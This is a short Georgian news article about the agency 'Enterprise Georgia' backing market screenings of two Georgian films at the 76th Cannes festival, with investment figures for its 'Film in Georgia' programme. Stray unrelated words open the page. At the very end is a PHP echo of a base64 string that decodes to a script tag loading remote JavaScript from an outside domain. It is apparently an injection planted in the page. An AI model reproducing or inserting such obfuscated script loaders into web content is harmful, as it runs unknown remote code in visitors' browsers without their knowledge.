celsiusi
ავერსი შნაიდერი

ეკონომიკისა და მდგრადი განვითარების სამინისტროს სააგენტო „აწარმოე საქართველოში“ ხელშეწყობით კანის 76-ე საერთაშორისო კინოფესტივალის მარკეტბაზარზე ორი ქართული ფილმის ჩვენება გაიმართება.

ფესტივალის მაყურებელი დღეს ნანა ჯანელიძის ფილმს „იარე, ლიზა“ და ირინე ჟორდანიას „ჰაერი ლურჯი აბრეშუმია" იხილავს.

კანის კინოფესტივალზე ორივე ფილმის მარკეტ ჩვენება სააგენტოს პროგრამა „გადაიღე საქართველოში“ ამოქმედებული ახალი კომპონენტის ფარგლებში მოხდება, რომლის მიზანიც ქართული ფილმების პოპულარიზაცია, კომერციალიზაცია და საერთაშორისო ფესტივალებზე ჩვენებაა. ჩვენებაზე ასევე მოწვეული იქნებიან საერთაშორისო გაყიდვების აგენტები და დისტრიბუტორები, რაც ზრდის კონკრეტული ფილმის წარმატებულად გაყიდვის შანსს.

ნანა ჯანელიძისა და ირინე ჟორდანიას ფილმები აპრილში, კინოინდუსტრიაში ჩართული კომპანიებისთვის გამოცხადებული კონკურსის წესით შეირჩა.

სააგენტოს „აწარმოე საქართველოში“ პროგრამის „გადაიღე საქართველოში“ ფარგლებში ამ ეტაპზე 30 განხორციელებული პროექტია, განხორციელებული ინვესტიცია, ჯამურად, 200 მილიონ ლარს შეადგენს, ანაზღაურებული თანხა კი 18 მილიონ ლარზე მეტია.

კანის 76-ე საერთაშორისო ფესტივალი 27 მაისს დასრულდება. 

323
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");